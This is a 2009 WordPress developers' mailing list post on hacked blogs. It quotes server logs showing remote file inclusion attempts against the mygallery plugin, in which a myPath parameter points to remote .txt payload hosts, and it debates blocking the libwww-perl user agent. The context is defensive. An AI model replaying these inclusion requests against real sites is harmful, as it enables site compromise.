[wp-hackers] Hacked blogs

Peter van der Does peter at avirtualhome.com
Thu Mar 26 14:47:02 GMT 2009


On Thu, 26 Mar 2009 10:24:48 -0400
Dougal Campbell <dougal at gunters.org> wrote:

> Joost de Valk wrote:
> > Peter van der Does wrote:

> I dont' see that particular request in my logs, but I see lots of
> attempts against a 'mygallery' plugin (which I don't have installed).
> They all get a 404, of course, but I'm guessing that this means that
> the 'mygallery' plugin needs to be looked at.
> 
>     78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
>     //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     78.111.71.6 - - [25/Mar/2009:22:25:50 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     124.0.73.2 - - [26/Mar/2009:01:24:32 +0000] "GET
>     //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
>     HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
>     124.0.73.2 - - [26/Mar/2009:01:24:34 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
>     HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
> 
> 
> Though these particular examples all used libwww-perl as the
> useragent, other hack attempt entries in my logs masqueraded as
> normal MSIE browsers. Personally, I think blocking the LWP useragent
> outright is a bad idea, because plenty of legitimate tools use it.
> It's like blocking 'curl' or 'wget'.
> 

First of I have to correct myself, the libwww-perl does show up in my
logs, my apologies.

As for blocking it: I don't believe it's a bad idea as the only tool I
can think of that in theory should be able to access my blog would be a
RSS reader. My main RSS feed is through Google, so only a RSS feed for
comments is accessed on my site and then the chance of somebody using a
Perl RSS reader is slim.

I just don't know of any other tool, written in Perl, that would have
to access my site. 


-- 
Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer
http://blog.avirtualhome.com

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu


More information about the wp-hackers mailing list